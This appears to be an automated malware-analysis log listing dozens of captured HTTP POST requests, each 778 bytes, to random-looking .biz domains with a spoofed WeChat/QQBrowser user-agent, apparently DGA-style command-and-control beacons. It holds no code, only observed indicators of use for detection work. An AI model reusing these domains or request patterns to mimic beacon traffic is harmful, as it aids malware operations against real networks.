Source: global trafficHTTP traffic detected: POST /i HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bghjpy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dnmujj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: damcprvgv.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ocsvqjg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cssyiwvwfakxyln HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ywffr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /asvi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ecxbwt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dnnoxqpiwspjj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pectx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /srcxcicm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zyiexezl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ydbxvrfdujat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: banwyw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /otrjjjdmycgv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /klxaypeiwoubq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wxgzshna.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mcduyucxmuwka HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zrlssa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /hrucffqs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jlqltsjvh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xyrgy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lmpk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: htwqzczce.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /euqwv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kvbjaur.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /tlbvmelxpwjipdp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uphca.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /pffvqbu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fjumtfnz.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vebfxvjlhsxr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hlzfuyy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /luseoc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: rffxu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ngujcsu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cikivjto.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /iljbyhyeqa HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qncdaagct.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ysihuw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: shpwbsrw.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cbrxaago HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cjvgcl.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /herwmjqyyara HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: neazudmrq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vtxunog HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pgfsvwx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ataqclhdwkpjy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: aatcwo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ruuxvcxs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kcyvxytog.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /exbxilbdfwja HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nwdnxrd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /htae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ereplfx.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vkhuh HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ptrim.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wtmpt HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: znwbniskf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /neaxbjvxiqaxty HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cpclnad.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ap HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: mjheo.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lpcmjvhkj HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: wluwplyh.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /sjbthkaicrc HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: zgapiej.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /dq HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: jifai.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /skriadsmnm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xnxvnn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wawfta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ihcnogskt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qcdcxwrbvorm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: kkqypycm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /x HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: uevrpr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lutskhb HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: fgajqjyhr.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /b HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: hagujcj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ljoreepy HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sctmku.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /wbxnuro HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qcrsp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ml HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: sewlqwcd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mxtehtsjbw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: dyjdrp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mcjaqbne HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: napws.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /jpwoteajscxojhae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: qvuhsaqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /mlvudlfi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: apzzls.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /icdmsrmds HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: krnsmlmvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /n HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: nlscndwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /lhdfgbabu HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: bzkysubds.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /qscftkkkcjjor HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ltpqsnu.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /bsw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vnvbt.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /grbkwbsae HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ypituyqsq.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /vlwdbxkbnakykkgr HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ijnmvqa.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /agvjkxoax HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: tltxn.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gopuf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vgypotwp.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /cfjx HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: giliplg.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /rtjiyksbemvook HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /gidkqlg HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /oiol HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: cvgrf.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /clexsjcapi HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: npukfztj.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /inwjou HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
Source: global trafficHTTP traffic detected: POST /ejhxrp HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: przvgke.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
